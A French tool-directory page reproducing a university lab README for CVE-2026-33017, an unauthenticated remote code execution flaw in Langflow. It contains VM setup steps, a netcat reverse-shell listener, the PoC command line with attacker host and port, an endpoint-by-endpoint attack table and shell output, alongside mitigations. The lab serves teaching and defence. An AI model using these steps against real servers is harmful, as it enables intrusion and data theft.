Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-33017 — # Laboratoire pédagogique démontrant une RCE non authentifiée dans Langflow via CVE-2026-33017, avec configuration automatisée de machine virtuelle et un exploit PoC pour un shell inversé. | Kitploit
Outils/GitHubGitHub/jorrit-vm/cve-2026-33017
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed TeamingOutil d'Accès à DistanceDéveloppement de Charges UtilesLabs et Pratique
GitHubjorrit-vm/cve-2026-33017

CVE-2026-33017

# Laboratoire pédagogique démontrant une RCE non authentifiée dans Langflow via CVE-2026-33017, avec configuration automatisée de machine virtuelle et un exploit PoC pour un shell inversé.

1il y a 3 moisPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-33017 — Langflow RCE non authentifiée

HoGent CyberSecurity II — Netwerk Pentesting & Exploitatie (NPE)
Academiejaar 2025–2026

CVE CVSS Langflow


Aperçu

Ce dépôt contient un environnement de laboratoire complet et une démonstration d'exploitation de CVE-2026-33017, une vulnérabilité critique d'exécution de code à distance (RCE) non authentifiée dans Langflow ≤ 1.8.1.

Un attaquant sans aucune authentification peut exécuter du code Python arbitraire sur le serveur via le endpoint /api/v1/build_public_tmp/{flow_id}/flow, car l'entrée utilisateur est directement transmise à exec() de Python sans sandboxing ni validation.

⚠️ Avertissement : Ce dépôt est exclusivement destiné à des fins éducatives dans un environnement de laboratoire contrôlé. Utilisez-le uniquement sur des systèmes pour lesquels vous disposez d'une autorisation explicite.


Architecture

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│                   HOST MACHINE                      │
│                                                     │
│  ┌──────────────────┐     ┌───────────────────────┐ │
│  │  Langflow-Victim │     │    Kali-Attacker      │ │
│  │  Ubuntu 22.04    │     │    Kali Linux         │ │
│  │  192.168.56.101  │◄────│    192.168.56.100     │ │
│  │  Langflow 1.8.1  │     │    PoC exploit tool   │ │
│  │  port 7860       │     │    + internet (NAT)   │ │
│  └──────────────────┘     └───────────────────────┘ │
│          Host-only netwerk: 192.168.56.0/24         │
└─────────────────────────────────────────────────────┘

Structure du dépôt

root@kitploit:~
CVE-2026-33017/
├── README.md # Ce fichier
├── LICENSE
├── .gitignore
├── docs/
│ └── stappenplan.md # Guide complet de déploiement et d'attaque
└── scripts/
├── setup_vms.sh # Phase 1 : Créer les VMs VirtualBox (HÔTE)
├── setup_victim.sh # Phase 2 : Installer Langflow 1.8.1 (VM Ubuntu)
└── setup_attacker.sh # Phase 3 : Installer l'outil PoC (VM Kali)

Démarrage rapide

Prérequis

  • VirtualBox 7.x avec VBoxManage dans le PATH
  • Ubuntu_22.04-VB-64bit.vdi → renommer en ubuntu-22.04.vdi
  • Kali_Linux-VB-64bit.vdi → renommer en kali-linux.vdi
  • Les deux fichiers VDI dans le même dossier que setup_vms.sh

Phase 1 — Créer les VMs (sur l'hôte)

root@kitploit:~
bash scripts/setup_vms.sh

Phase 2 — Configurer la VM victime (sur la VM Ubuntu)

root@kitploit:~
# Identifiants : osboxes / osboxes.org
sudo bash scripts/setup_victim.sh

Phase 3 — Configurer la VM attaquante (sur la VM Kali)

root@kitploit:~
# Identifiants : osboxes / osboxes.org
sudo bash scripts/setup_attacker.sh

Exécuter l'attaque

Terminal 1 — Écouteur de reverse shell :

root@kitploit:~
nc -lvnp 4444

Terminal 2 — Exploit :

root@kitploit:~
cd ~/CVE-2026-33017-Langflow-RCE-PoC
source venv/bin/activate
python3 cve-2026-33017.py 192.168.56.101 --shell \
  --lhost 192.168.56.100 --lport 4444

Le PoC est installé automatiquement par setup_attacker.sh.
PoC utilisé : omer-efe-curkus/CVE-2026-33017-Langflow-RCE-PoC


Comment fonctionne l'exploit

ÉtapeEndpointDescription
1GET /api/v1/auto_loginRécupère le jeton JWT superutilisateur (AUTO_LOGIN=true)
2POST /api/v1/flows/Crée un nouveau flux public via l'API
3POST /api/v1/build_public_tmp/{id}/flowInjecte un CustomComponent avec du code Python malveillant
4exec() dans validate.py:397Le code est exécuté sans sandboxing — RCE

Preuve d'exécution

[] Fetching access token... [+] Public Flow ID created: 11571add-6416-4226-b8e6-844202cce6ff [] Sending reverse shell to connect back to 192.168.56.100:4444

Listener (Terminal 1): connect to [192.168.56.100] from (UNKNOWN) [192.168.56.101] 36160 $ whoami user $ hostname e37190a2f147 $ find /app -name "*.db" /app/.venv/lib/python3.12/site-packages/langflow/langflow.db


Atténuation

  • Mettre à jour vers Langflow ≥ 1.9.0 — supprime le paramètre data vulnérable
  • Désactiver LANGFLOW_AUTO_LOGIN en production
  • Restreindre l'accès réseau au port 7860 via un pare-feu
  • Placer Langflow derrière un proxy inverse avec authentification

Références

  • NVD — CVE-2026-33017
  • GitHub Advisory GHSA-vwmf-pq79-vjvx
  • Sysdig — Exploited in 20 hours
  • SonicWall — Technical Analysis
  • PoC par omer-efe-curkus

HoGent — Toegepaste Informatica — CyberSecurity II — 2025–2026

Télécharger l’outil